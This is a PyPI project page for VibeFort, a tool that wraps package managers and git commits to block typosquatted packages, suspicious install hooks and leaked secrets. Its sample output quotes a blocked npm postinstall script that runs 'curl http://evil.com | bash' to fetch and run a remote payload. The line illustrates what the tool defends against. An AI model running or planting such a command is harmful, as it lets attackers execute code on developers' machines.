Security layer for AI-assisted development. One command, permanent protection.
Project description
🏰 VibeFort
Security layer for AI-assisted development. One command, permanent protection.
VibeFort protects vibecoders (Cursor, Bolt, Replit, Claude Code users) from supply chain attacks, leaked secrets, and insecure AI-generated code. Run vibefort install once — it silently protects every package install and git commit forever.
Quick Start
pipx install vibefort
vibefort install
That's it. You never type vibefort again.
Why pipx? VibeFort is a system-wide CLI tool, not a project dependency.
pipxinstalls it globally in an isolated environment — the standard way to install Python CLI tools. Install pipx if you don't have it:brew install pipx(macOS) orapt install pipx(Ubuntu).
What Happens After Install
# Normal pip usage — VibeFort intercepts silently
$ pip install flask
✔ flask 3.1.0 — clean (0.2s)
$ pip install reqeusts
✖ BLOCKED — Possible typosquat — similar to 'requests'
Did you mean: requests
$ npm install evil-pkg
✖ BLOCKED — suspicious postinstall script: downloads external payload
package.json: postinstall runs curl http://evil.com | bash
# Normal git usage — VibeFort scans staged files
$ git commit -m "add config"
✖ VibeFort blocked this commit — 1 secret(s) found
Secret found in src/config.py:14
AWS Access Key detected
Supported Package Managers
VibeFort intercepts 10 package managers across Python and Node.js:
Python
| Manager | Commands intercepted |
|---|---|
pip / pip3 |
pip install flask, pip install flask==3.1.0 |
uv |
uv pip install flask, uv add flask |
pipx |
pipx install black |
Node.js
| Manager | Commands intercepted |
|---|---|
npm |
npm install, npm add, npm i |
npx |
npx create-react-app (scans before execute) |
yarn |
yarn add express |
pnpm |
pnpm add express |
bun |
bun add express |
bunx |
bunx cowsay (scans before execute) |
npxandbunxare especially dangerous — they download AND execute code in one step. VibeFort scans the package before allowing execution.
How It Works
Package Scanning (automatic)
Every package install goes through two tiers:
| Tier | What it checks | Speed | When |
|---|---|---|---|
| Tier 1 | Known-safe cache (10k packages), typosquatting, registry existence, slopsquatting | < 500ms | Every install |
| Tier 2 | Downloads to temp, inspects setup.py/package.json hooks, .pth files, obfuscated code | 3-5s | Unknown packages |
Secret Scanning (automatic)
Git pre-commit hook powered by betterleaks (234 detection rules):
- AWS, OpenAI, Anthropic, GitHub, Stripe, Google API keys
- SSH/PGP private keys, JWT tokens
- Database connection strings
- And 220+ more patterns
Coming Soon
vibefort scan .— code vulnerability scanning (SQL injection, XSS, insecure deserialization)vibefort infra .— infrastructure auditing (Supabase, Firebase, open S3 buckets)vibefort audit— system compromise check- AI-powered analysis with plain-English explanations
Commands
| Command | Description |
|---|---|
vibefort install |
One-time setup: hooks + secret scanner |
vibefort uninstall |
Clean removal of all hooks |
vibefort status |
Dashboard with scan stats |
vibefort --version |
Show version |
How Install Works
vibefort install does two things that persist forever:
-
Shell hook — Adds function wrappers to
~/.zshrcor~/.bashrcthat intercept all 10 package managers. Loads every time a terminal opens. -
Git hook — Sets a global pre-commit hook via
git config --global core.hooksPath. Applies to every repo.
A 🏰 castle icon appears in your terminal when VibeFort is active.
vibefort uninstall cleanly removes both.
License
MIT — see LICENSE.
Secret scanning powered by betterleaks (MIT). See THIRD_PARTY_NOTICES.
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file vibefort-0.1.0.tar.gz.
File metadata
- Download URL: vibefort-0.1.0.tar.gz
- Upload date:
- Size: 157.7 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.14.3
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
a191823a5b287a127403339b424b85ede94806682f43f9e50ad04c7e29e6caa7
|
|
| MD5 |
0affb95d7b6f896f6d3d9084cc94de1a
|
|
| BLAKE2b-256 |
b9adb9bb476d38d566a124054fb591b12818668dbfda266fca4428498a793002
|
File details
Details for the file vibefort-0.1.0-py3-none-any.whl.
File metadata
- Download URL: vibefort-0.1.0-py3-none-any.whl
- Upload date:
- Size: 138.3 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.14.3
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
53f6e8d343b8d4f23055a8e08ba33572a7f27ec40388444283a14c07aaa1cd34
|
|
| MD5 |
e9ad69ed2e5b8f0849162d1a49fec0b8
|
|
| BLAKE2b-256 |
de8d1743fad4cb178a8439767b078c0516031c42fc3b791bb1ad65892e616ced
|